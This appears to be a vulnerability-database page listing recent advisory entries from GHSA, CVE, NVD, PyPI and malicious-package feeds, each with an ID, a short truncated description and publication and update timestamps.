Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-q796-56gh-95qf In Phiewer 4.1.0, a dylib injection leads to Command Execution which allow attackers to inject dyli… 2025-01-16T00:31:22Z 2025-01-18T00:30:47Z
ghsa-7676-xq8c-838g In BnAudioPolicyService::onTransact of IAudioPolicyService.cpp, there is a possible information dis… 2024-11-28T06:32:41Z 2025-01-18T00:30:47Z
ghsa-4m93-7xp3-q2w8 An issue in termius before v.9.9.0 allows a local attacker to execute arbitrary code via a crafted … 2025-01-16T00:31:22Z 2025-01-18T00:30:47Z
ghsa-c9p4-xwr9-rfhx Zot IdP group membership revocation ignored 2025-01-17T22:02:26Z 2025-01-17T22:16:46Z
ghsa-v4mq-x674-ff73 AWS Cloud Development Kit (AWS CDK) IAM OIDC custom resource allows connection to unauthorized OIDC… 2025-01-17T21:22:25Z 2025-01-17T21:57:03Z
ghsa-fcr8-4r9f-r66m nbgrader's `frame-ancestors: self` grants all users access to formgrader 2025-01-17T16:29:16Z 2025-01-17T21:56:51Z
ghsa-gp5f-6cr8-73qf A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as cr… 2025-01-17T21:31:40Z 2025-01-17T21:31:40Z
ghsa-4p2h-h982-8v2v A vulnerability, which was classified as problematic, was found in code-projects Tourism Management… 2025-01-17T21:31:40Z 2025-01-17T21:31:40Z
ghsa-vvqc-c7cm-52wp Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-v5j2-wgv7-q2cg A vulnerability classified as critical has been found in Codezips Gym Management System 1.0. This a… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-rx9q-hw8f-rvr7 WeGIA < 3.2.0 is vulnerable to Cross Site Scripting (XSS) via the dados_addInfo parameter of docume… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-q4cc-rq78-hxf8 WeGIA < 3.2.0 is vulnerable to SQL Injection in query_geracao_auto.php via the query parameter. 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-p6qw-j3rw-2577 Cross Site Scripting vulnerability in sunnygkp10 Online Exam System master version allows a remote … 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-mvrq-wf2x-8c9p A vulnerability exists in Algo Edge up to 2.1.1 - a previously used (legacy) component of navify® A… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-jqpc-q3rg-3f4f Clickjacking vulnerability in typecho v1.2.1. 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-hx65-9q68-4gq8 A vulnerability classified as critical was found in 1000 Projects Attendance Tracking Management Sy… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-g7wc-qp54-cppx A vulnerability, which was classified as problematic, has been found in code-projects Car Rental Ma… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-fv6j-x52x-7r32 WeGIA v3.2.0 is vulnerable to SQL Injection viathe nextPage parameter in /controle/control.php. 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-fpv2-wmww-mxc8 WeGIA < 3.2.0 is vulnerable to SQL Injection in /funcionario/remuneracao.php via the id_funcionario… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-924c-vmpj-6rfg The WordPress Webinar Plugin – WebinarPress plugin for WordPress is vulnerable to modification of d… 2025-01-08T06:30:55Z 2025-01-17T21:31:39Z
ghsa-7cj3-x93g-gj76 Signature forgery in Spring Boot's Loader 2024-08-23T09:30:35Z 2025-01-17T21:31:39Z
ghsa-78xr-cmr3-fxq9 Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-6qmx-42h2-j8h6 .NET Elevation of Privilege Vulnerability 2024-04-17T18:21:57Z 2025-01-17T21:31:39Z
ghsa-6q3f-jmwm-286h Wegia < 3.2.0 is vulnerable to Cross Site Scripting (XSS) in /geral/documentos_funcionario.php via … 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-5866-49gr-22v4 REXML DoS vulnerability 2024-08-02T12:33:15Z 2025-01-17T21:31:39Z
ghsa-4xqq-m2hx-25v8 REXML denial of service vulnerability 2024-07-16T19:49:15Z 2025-01-17T21:31:39Z
ghsa-4m2r-43mh-wr82 A vulnerability was found in 1000 Projects Campaign Management System Platform for Women 1.0. It ha… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-3723-f7xr-2xgj WeGIA < 3.2.0 is vulnerable to Incorrect Access Control in controle/control.php. The application do… 2025-01-17T21:31:39Z 2025-01-17T21:31:39Z
ghsa-2235-g2f2-vp6c The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to unauthorized… 2025-01-08T06:30:54Z 2025-01-17T21:31:39Z
ghsa-h24r-m9qc-pvpg Ansible-core information disclosure flaw 2024-02-06T12:30:31Z 2025-01-17T21:31:38Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2020-0402 N/A {'providerMetadata': {'orgId': 'baff130e-b8d5-4e15-b3d3-c3cf5d5545c6', 'shortName': 'google_android', 'dateUpdated': '2025-01-17T22:56:35.169Z'}, 'rejectedReasons': [{'lang': 'en', 'supportingMedia': [{'base64': False, 'type': 'text/html', 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}], 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}]} N/A N/A 2025-01-17T22:56:35.169Z
cve-2021-0323 N/A {'providerMetadata': {'orgId': 'baff130e-b8d5-4e15-b3d3-c3cf5d5545c6', 'shortName': 'google_android', 'dateUpdated': '2025-01-17T22:56:01.145Z'}, 'rejectedReasons': [{'lang': 'en', 'supportingMedia': [{'base64': False, 'type': 'text/html', 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}], 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}]} N/A N/A 2025-01-17T22:56:01.145Z
cve-2021-0447 N/A {'providerMetadata': {'orgId': 'baff130e-b8d5-4e15-b3d3-c3cf5d5545c6', 'shortName': 'google_android', 'dateUpdated': '2025-01-17T22:55:24.815Z'}, 'rejectedReasons': [{'lang': 'en', 'supportingMedia': [{'base64': False, 'type': 'text/html', 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}], 'value': 'This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.'}]} N/A N/A 2025-01-17T22:55:24.815Z
cve-2024-44092 N/A There is a possible LCS signing enforcement missi… Google
Android
2024-09-13T20:28:35.115Z 2025-01-17T22:30:29.387Z
cve-2025-23208 IdP group membership revocation ignored in zot project-zot
zot
2025-01-17T22:24:09.406Z 2025-01-17T22:24:09.406Z
cve-2021-21158 N/A {'providerMetadata': {'orgId': 'ebfee0ef-53dd-4cf3-9e2a-08a5bd7a7e28', 'shortName': 'Chrome', 'dateUpdated': '2025-01-17T22:21:15.793Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Further investigation determines issue is not within scope of this CNA'}]} N/A N/A 2025-01-17T22:21:15.793Z
cve-2022-0303 N/A {'providerMetadata': {'orgId': 'ebfee0ef-53dd-4cf3-9e2a-08a5bd7a7e28', 'shortName': 'Chrome', 'dateUpdated': '2025-01-17T22:20:15.391Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Further investigation determines issue is not a vulnerability'}]} N/A N/A 2025-01-17T22:20:15.391Z
cve-2022-46732 N/A CVE-2022-46732 GE Digital
Proficy Historian
2023-01-17T23:31:14.972Z 2025-01-17T22:13:06.336Z
cve-2022-40633 N/A Rittal CMC III Improper Access Control Rittal
CMC III
2023-03-02T22:18:31.192Z 2025-01-17T22:11:59.387Z
cve-2023-0622 N/A CVE-2023-0622 Horner Automation
Cscape Envision RV
2023-03-09T21:10:55.755Z 2025-01-17T22:10:45.410Z
cve-2023-0623 N/A CVE-2023-0623 Horner Automation
Cscape Envision RV
2023-03-09T21:12:00.661Z 2025-01-17T22:09:58.228Z
cve-2023-0621 N/A CVE-2023-0621 Horner Automation
Cscape Envision RV
2023-03-09T21:13:06.983Z 2025-01-17T22:09:20.608Z
cve-2022-46300 N/A CVE-2022-46300 VISAM
VBASE
2023-03-21T22:10:34.483Z 2025-01-17T22:08:25.887Z
cve-2022-43512 N/A CVE-2022-43512 VISAM
VBASE
2023-03-21T22:19:09.431Z 2025-01-17T22:07:51.279Z
cve-2022-41696 N/A CVE-2022-41696 VISAM
VBASE
2023-03-21T22:19:30.671Z 2025-01-17T22:07:09.782Z
cve-2022-45121 N/A CVE-2022-45121 VISAM
VBASE
2023-03-21T22:22:53.204Z 2025-01-17T22:06:23.028Z
cve-2022-45468 N/A CVE-2022-45468 VISAM
VBASE
2023-03-21T22:24:37.550Z 2025-01-17T22:05:23.827Z
cve-2023-50738 4.3 (v3.1) A firmware downgrade prevention vulnerability has been… Lexmark
Printer Firmware
2025-01-17T21:10:44.220Z 2025-01-17T22:02:59.237Z
cve-2024-4353 4.6 (v4.0) Stored XSS in Generate Board Name Input Field Concrete CMS
Concrete CMS
2024-08-01T18:23:31.033Z 2025-01-17T21:55:57.746Z
cve-2025-23892 6.5 (v3.1) WordPress Progress Tracker plugin <= 0.9.3 - Cross Sit… Alex Furr and Simon Ward
Progress Tracker
2025-01-16T20:07:40.234Z 2025-01-17T21:52:58.506Z
cve-2025-23884 7.1 (v3.1) WordPress Annie plugin <= 2.1.1 - CSRF to Stored XSS v… Chris Roberts
Annie
2025-01-16T20:07:40.841Z 2025-01-17T21:51:47.811Z
cve-2025-23891 6.5 (v3.1) WordPress Yet Another Countdown Plugin plugin <= 1.0.1… Vincent Loy
Yet Another Countdown
2025-01-16T20:07:41.466Z 2025-01-17T21:51:02.043Z
cve-2025-23887 6.5 (v3.1) WordPress Blog Summary plugin <= 0.1.2 β - Cross Site … Scott Allan Wallick
Blog Summary
2025-01-16T20:07:42.099Z 2025-01-17T21:50:00.490Z
cve-2023-25953 N/A Code injection vulnerability in Drive Explorer fo… WORKS MOBILE Japan Corp.
Drive Explorer for macOS
2023-05-23T00:00:00 2025-01-17T21:47:04.078Z
cve-2024-8291 5.1 (v4.0) Concrete CMS Stored XSS in Image Editor Background Color Concrete CMS
Concrete CMS
2024-09-24T21:17:00.734Z 2025-01-17T21:44:15.351Z
cve-2025-0541 Codezips Gym Management System edit_member.php sql injection Codezips
Gym Management System
2025-01-17T21:31:05.006Z 2025-01-17T21:43:06.350Z
cve-2024-52870 N/A Teradata Vantage Editor 1.0.1 is mostly intended … n/a
n/a
2025-01-17T00:00:00 2025-01-17T21:39:41.897Z
cve-2024-4350 5.1 (v4.0) Concrete CMS version 9 below 9.3.3 and below 8.5.18 ar… Concrete CMS
Concrete CMS
2024-08-09T00:37:44.009Z 2025-01-17T21:35:42.878Z
cve-2025-23207 \htmlData does not validate attribute names in KaTeX KaTeX
KaTeX
2025-01-17T21:25:05.746Z 2025-01-17T21:32:24.984Z
cve-2024-57372 N/A Cross Site Scripting vulnerability in Information… n/a
n/a
2025-01-17T00:00:00 2025-01-17T21:24:49.324Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2024-55503 N/A An issue in termius before v.9.9.0 allows a local… n/a
n/a
2025-01-15T00:00:00 2025-01-15T22:53:53.826462
cve-2024-53407 N/A In Phiewer 4.1.0, a dylib injection leads to Comm… n/a
n/a
2025-01-15T00:00:00 2025-01-15T22:52:39.134499
cve-2024-12613 Passwords Manager <= 1.4.8 - Unauthenticated SQL Injection coder426
Passwords Manager
2025-01-16T09:39:15.443Z 2025-01-16T14:48:07.534Z
cve-2024-12614 Passwords Manager <= 1.4.8 - Missing Authorization to … coder426
Passwords Manager
2025-01-16T09:39:14.567Z 2025-01-16T14:56:00.766Z
cve-2024-12615 Passwords Manager <= 1.4.8 - Authenticated (Subscriber… coder426
Passwords Manager
2025-01-16T09:39:15.003Z 2025-01-16T14:52:39.062Z
cve-2025-23207 \htmlData does not validate attribute names in KaTeX KaTeX
KaTeX
2025-01-17T21:25:05.746Z 2025-01-17T21:32:24.984Z
cve-2025-0541 Codezips Gym Management System edit_member.php sql injection Codezips
Gym Management System
2025-01-17T21:31:05.006Z 2025-01-17T21:43:06.350Z
cve-2024-8291 5.1 (v4.0) Concrete CMS Stored XSS in Image Editor Background Color Concrete CMS
Concrete CMS
2024-09-24T21:17:00.734Z 2025-01-17T21:44:15.351Z
cve-2024-57372 N/A Cross Site Scripting vulnerability in Information… n/a
n/a
2025-01-17T00:00:00 2025-01-17T21:24:49.324Z
cve-2024-57252 N/A OtCMS <=V7.46 is vulnerable to Server-Side Reques… n/a
n/a
2025-01-17T00:00:00 2025-01-17T21:14:18.996Z
cve-2024-52870 N/A Teradata Vantage Editor 1.0.1 is mostly intended … n/a
n/a
2025-01-17T00:00:00 2025-01-17T21:39:41.897Z
cve-2024-4353 4.6 (v4.0) Stored XSS in Generate Board Name Input Field Concrete CMS
Concrete CMS
2024-08-01T18:23:31.033Z 2025-01-17T21:55:57.746Z
cve-2024-4350 5.1 (v4.0) Concrete CMS version 9 below 9.3.3 and below 8.5.18 ar… Concrete CMS
Concrete CMS
2024-08-09T00:37:44.009Z 2025-01-17T21:35:42.878Z
cve-2023-50738 4.3 (v3.1) A firmware downgrade prevention vulnerability has been… Lexmark
Printer Firmware
2025-01-17T21:10:44.220Z 2025-01-17T22:02:59.237Z
cve-2023-25953 N/A Code injection vulnerability in Drive Explorer fo… WORKS MOBILE Japan Corp.
Drive Explorer for macOS
2023-05-23T00:00:00 2025-01-17T21:47:04.078Z
cve-2023-0623 N/A CVE-2023-0623 Horner Automation
Cscape Envision RV
2023-03-09T21:12:00.661Z 2025-01-17T22:09:58.228Z
cve-2023-0622 N/A CVE-2023-0622 Horner Automation
Cscape Envision RV
2023-03-09T21:10:55.755Z 2025-01-17T22:10:45.410Z
cve-2023-0621 N/A CVE-2023-0621 Horner Automation
Cscape Envision RV
2023-03-09T21:13:06.983Z 2025-01-17T22:09:20.608Z
cve-2022-46732 N/A CVE-2022-46732 GE Digital
Proficy Historian
2023-01-17T23:31:14.972Z 2025-01-17T22:13:06.336Z
cve-2022-46300 N/A CVE-2022-46300 VISAM
VBASE
2023-03-21T22:10:34.483Z 2025-01-17T22:08:25.887Z
cve-2022-45468 N/A CVE-2022-45468 VISAM
VBASE
2023-03-21T22:24:37.550Z 2025-01-17T22:05:23.827Z
cve-2022-45121 N/A CVE-2022-45121 VISAM
VBASE
2023-03-21T22:22:53.204Z 2025-01-17T22:06:23.028Z
cve-2022-43512 N/A CVE-2022-43512 VISAM
VBASE
2023-03-21T22:19:09.431Z 2025-01-17T22:07:51.279Z
cve-2022-41696 N/A CVE-2022-41696 VISAM
VBASE
2023-03-21T22:19:30.671Z 2025-01-17T22:07:09.782Z
cve-2022-40633 N/A Rittal CMC III Improper Access Control Rittal
CMC III
2023-03-02T22:18:31.192Z 2025-01-17T22:11:59.387Z
cve-2015-2387 N/A ATMFD.DLL in the Adobe Type Manager Font Driver i… n/a
n/a
2015-07-14T22:00:00 2024-08-06T05:10:16.200Z
cve-2015-2425 N/A Microsoft Internet Explorer 11 allows remote atta… n/a
n/a
2015-07-14T21:00:00 2024-08-06T05:17:26.135Z
cve-2015-2424 N/A Microsoft PowerPoint 2007 SP3, Word 2007 SP3, Pow… n/a
n/a
2015-07-14T21:00:00 2024-08-06T05:17:26.128Z
cve-2015-2419 N/A JScript 9 in Microsoft Internet Explorer 10 and 1… n/a
n/a
2015-07-14T21:00:00 2024-08-06T05:10:16.731Z
cve-2015-2546 N/A The kernel-mode driver in Microsoft Windows Vista… n/a
n/a
2015-09-09T00:00:00 2024-08-06T05:17:27.275Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2024-55503 An issue in termius before v.9.9.0 allows a local attacker to execute arbitrary code via a crafted … 2025-01-15T23:15:09.390 2025-01-17T22:51:48.330
fkie_cve-2024-53407 In Phiewer 4.1.0, a dylib injection leads to Command Execution which allow attackers to inject dyli… 2025-01-15T23:15:09.263 2025-01-17T22:51:40.307
fkie_cve-2024-12613 The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix val… 2025-01-16T10:15:07.633 2025-01-17T22:17:16.967
fkie_cve-2024-12614 The Passwords Manager plugin for WordPress is vulnerable to unauthorized modification of data due t… 2025-01-16T10:15:08.023 2025-01-17T22:17:15.190
fkie_cve-2024-12615 The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix val… 2025-01-16T10:15:08.380 2025-01-17T22:17:11.650
fkie_cve-2025-23207 KaTeX is a fast, easy-to-use JavaScript library for TeX math rendering on the web. KaTeX users who … 2025-01-17T22:15:29.523 2025-01-17T22:15:29.523
fkie_cve-2025-0541 A vulnerability was found in Codezips Gym Management System 1.0 and classified as critical. This is… 2025-01-17T22:15:29.337 2025-01-17T22:15:29.337
fkie_cve-2024-8291 Concrete CMS versions 9.0.0 to 9.3.3 and below 8.5.19 are vulnerable to Stored XSS in Image Editor … 2024-09-25T01:15:46.193 2025-01-17T22:15:29.107
fkie_cve-2024-57372 Cross Site Scripting vulnerability in InformationPush master version allows a remote attacker to ob… 2025-01-17T20:15:29.447 2025-01-17T22:15:28.957
fkie_cve-2024-57252 OtCMS <=V7.46 is vulnerable to Server-Side Request Forgery (SSRF) in /admin/read.php, which can Rea… 2025-01-17T21:15:10.217 2025-01-17T22:15:28.817
fkie_cve-2024-52870 Teradata Vantage Editor 1.0.1 is mostly intended for SQL database access and docs.teradata.com acce… 2025-01-17T20:15:28.527 2025-01-17T22:15:28.663
fkie_cve-2024-4353 Concrete CMS versions 9.0.0 through 9.3.2 are affected by a stored XSS vulnerability in the generat… 2024-08-01T19:15:52.313 2025-01-17T22:15:28.510
fkie_cve-2024-4350 Concrete CMS versions 9.0.0 to 9.3.2 and below 8.5.18 are vulnerable to Stored XSS in RSS Displayer… 2024-08-12T13:38:36.460 2025-01-17T22:15:28.360
fkie_cve-2023-50738 A new feature to prevent Firmware downgrades was recently added to some Lexmark products. A method … 2025-01-17T21:15:09.660 2025-01-17T22:15:28.167
fkie_cve-2023-25953 Code injection vulnerability in Drive Explorer for macOS versions 3.5.4 and earlier allows an attac… 2023-05-23T02:15:09.317 2025-01-17T22:15:27.970
fkie_cve-2023-0623 Cscape Envision RV version 4.60 is vulnerable to an out-of-bounds write vulnerability when parsing … 2023-03-09T22:15:51.737 2025-01-17T22:15:27.790
fkie_cve-2023-0622 Cscape Envision RV version 4.60 is vulnerable to an out-of-bounds write vulnerability when parsing … 2023-03-09T22:15:51.667 2025-01-17T22:15:27.613
fkie_cve-2023-0621 Cscape Envision RV version 4.60 is vulnerable to an out-of-bounds read vulnerability when parsing p… 2023-03-09T22:15:51.597 2025-01-17T22:15:27.440
fkie_cve-2022-46732 Even if the authentication fails for local service authentication, the requested command could stil… 2023-01-18T00:15:12.357 2025-01-17T22:15:27.260
fkie_cve-2022-46300 Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user op… 2023-03-21T23:15:12.563 2025-01-17T22:15:27.093
fkie_cve-2022-45468 Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user op… 2023-03-21T23:15:12.400 2025-01-17T22:15:26.927
fkie_cve-2022-45121 Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user op… 2023-03-21T23:15:12.333 2025-01-17T22:15:26.757
fkie_cve-2022-43512 Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user op… 2023-03-21T23:15:12.277 2025-01-17T22:15:26.590
fkie_cve-2022-41696 Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user op… 2023-03-21T23:15:12.167 2025-01-17T22:15:26.413
fkie_cve-2022-40633 A malicious actor can clone access cards used to open control cabinets secured with Rittal CMC III locks. 2023-03-02T23:15:10.090 2025-01-17T22:15:26.210
fkie_cve-2015-2387 ATMFD.DLL in the Adobe Type Manager Font Driver in Microsoft Windows Server 2003 SP2, Windows Vista… 2015-07-14T22:59:08.103 2025-01-17T21:42:17.533
fkie_cve-2015-2425 Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial … 2015-07-14T21:59:36.813 2025-01-17T21:42:13.630
fkie_cve-2015-2424 Microsoft PowerPoint 2007 SP3, Word 2007 SP3, PowerPoint 2010 SP2, Word 2010 SP2, PowerPoint 2013 S… 2015-07-14T21:59:35.987 2025-01-17T21:42:06.810
fkie_cve-2015-2419 JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary cod… 2015-07-14T21:59:33.283 2025-01-17T21:39:50.700
fkie_cve-2015-2546 The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows … 2015-09-09T00:59:53.207 2025-01-17T21:36:42.523
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
pysec-2023-298 isInList in the safeurl-python package before 1.2 for Python has an insufficiently restrictive regu… 2023-01-30T05:15:00Z 2024-11-25T22:26:07.130924Z
pysec-2011-25 Unspecified vulnerability in (1) Zope 2.12.x before 2.12.19 and 2.13.x before 2.13.8, as used in Pl… 2011-07-19T20:55:00Z 2024-11-25T22:26:05.519360Z
pysec-2023-270 A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to ta… 2023-03-06T23:15:00Z 2024-11-25T22:26:00.352650Z
pysec-2022-43071 api-res-py package in PyPI 0.1 is vulnerable to a code execution backdoor in the request package. 2022-06-08T20:15:00Z 2024-11-25T22:25:53.019921Z
pysec-2022-43069 Apache IoTDB version 0.13.0 is vulnerable by session id attack. Users should upgrade to version 0.1… 2022-09-05T10:15:00Z 2024-11-25T22:25:52.941293Z
pysec-2022-43174 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43163 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43151 Patchelf v0.9 was discovered to contain an out-of-bounds read via the function modifyRPath at src/p… 2022-12-19T22:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43136 WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2, reqmon 1.4.1rc5, and global-workque… 2022-07-28T23:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2022-43134 The exotel (aka exotel-py) package in PyPI as of 0.1.6 includes a code execution backdoor inserted … 2022-08-27T20:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2019-243 Designate does not enforce the DNS protocol limit concerning record set sizes 2019-11-22T15:15:00Z 2024-11-25T22:09:33.909779Z
pysec-2017-114 Designate 2015.1.0 through 1.0.0.0b1 as packaged in OpenStack Kilo does not enforce RecordSets per … 2017-08-31T22:29:00Z 2024-11-25T22:09:33.909779Z
pysec-2006-4 Multiple heap-based buffer overflows in Libextractor 0.5.13 and earlier allow remote attackers to e… 2006-05-18T23:02:00Z 2024-11-25T22:09:33.909779Z
pysec-2024-153 Streamlit is a data oriented application development framework for python. Snowflake Streamlit open… 2024-08-12T17:15:17+00:00 2024-11-25T21:22:50.933853+00:00
pysec-2024-152 aiocpa is a user-facing library for generating color gradients of text. Version 0.1.13 introduced o… 2024-11-25T19:30:00+00:00
pysec-2023-302 An issue in /upydev/keygen.py in upydev v0.4.3 allows attackers to decrypt sensitive information vi… 2023-11-20T23:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2023-289 An issue in Plone CMS v. 5.2.4, 5.2.3, 5.2.2, 5.2.1, 5.2.0, 5.1rc2, 5.1rc1, 5.1b4, 5.1b3, 5.1b2, 5.… 2023-02-17T18:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2023-276 An XSS vulnerability was discovered in the Mayan EDMS DMS. Successful XSS exploitation was observed… 2023-02-07T22:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43154 WASM3 v0.5.0 was discovered to contain a heap overflow via the component /wabt/bin/poc.wasm. 2022-05-20T19:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43152 A flaw was found in the python-scciclient when making an HTTPS connection to a server where the ser… 2022-09-01T18:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43146 py-cord is a an API wrapper for Discord written in Python. Bots creating using py-cord version 2.0.… 2022-08-18T15:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43145 libImaging/TgaRleDecode.c in Pillow 9.1.0 has a heap buffer overflow in the processing of invalid T… 2022-05-25T12:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43144 Patchelf v0.9 was discovered to contain an out-of-bounds read via the function modifyRPath at src/p… 2022-12-19T22:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43140 A heap buffer overflow in the LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind function of LI… 2022-11-17T23:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43139 A vulnerability in the LIEF::MachO::SegmentCommand::virtual_address function of LIEF v0.12.1 allows… 2022-09-30T19:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43138 A vulnerability in the LIEF::MachO::BinaryParser::init_and_parse function of LIEF v0.12.1 allows at… 2022-10-03T13:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2022-43135 FreeTAKServer 1.9.8 contains a hardcoded Flask secret key which allows attackers to create crafted … 2022-03-11T00:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2021-890 Buffer overflow in ajaxsoundstudio.com Pyo &lt and 1.03 in the Server_jack_init function. which all… 2021-12-17T21:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2021-889 A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel vi… 2021-03-24T15:15:00Z 2024-11-25T18:35:18.357593Z
pysec-2019-252 In parser/btorsmt2.c in Boolector 3.0.0, opening a specially crafted input file leads to a use afte… 2019-02-07T07:29:00Z 2024-11-25T18:35:18.357593Z
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33874 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33861 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33850 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33856 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33870 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33849 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33854 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33868 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33881 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33880 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33877 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33873 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33859 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33875 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33878 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33858 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33872 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33857 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33853 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33863 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33852 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33866 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33867 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33871 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33862 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33864 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33865 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33869 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33860 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-10556 Malicious code in com.immutable.api.zkevm (npm) 2024-11-07T23:45:35Z 2024-12-05T00:35:14Z
mal-2024-10553 Malicious code in autolink-jira-issue (npm) 2024-11-08T08:41:39Z 2024-12-05T00:35:14Z
mal-2024-10550 Malicious code in activity_logs_monitoring (npm) 2024-11-08T08:11:56Z 2024-12-05T00:35:14Z
mal-2024-10535 Malicious code in deriv-app-id-action (npm) 2024-11-08T12:15:59Z 2024-12-05T00:35:14Z
mal-2024-11188 Malicious code in private-lib-bug-bounty (npm) 2024-12-04T20:43:08Z 2024-12-04T20:43:08Z
mal-2024-11187 Malicious code in cdp-agentkit (npm) 2024-12-04T18:40:44Z 2024-12-04T18:40:44Z
mal-2024-11186 Malicious code in cdp-agentkit-nodejs (npm) 2024-12-04T18:30:54Z 2024-12-04T18:30:54Z
mal-2024-11189 Malicious code in pocfinalone.js (npm) 2024-12-04T18:30:35Z 2024-12-04T18:30:35Z
mal-2024-11185 Malicious code in com.bovinelabs.analyzers (npm) 2024-12-04T16:30:55Z 2024-12-04T16:30:55Z
mal-2024-11190 Malicious code in vue-midata (npm) 2024-12-04T11:57:41Z 2024-12-04T11:57:41Z
mal-2024-11199 Malicious code in wrapped-tokens (npm) 2024-12-04T05:08:01Z 2024-12-04T05:13:14Z
mal-2024-11195 Malicious code in fastify-tfb (npm) 2024-12-04T05:08:01Z 2024-12-04T05:13:13Z
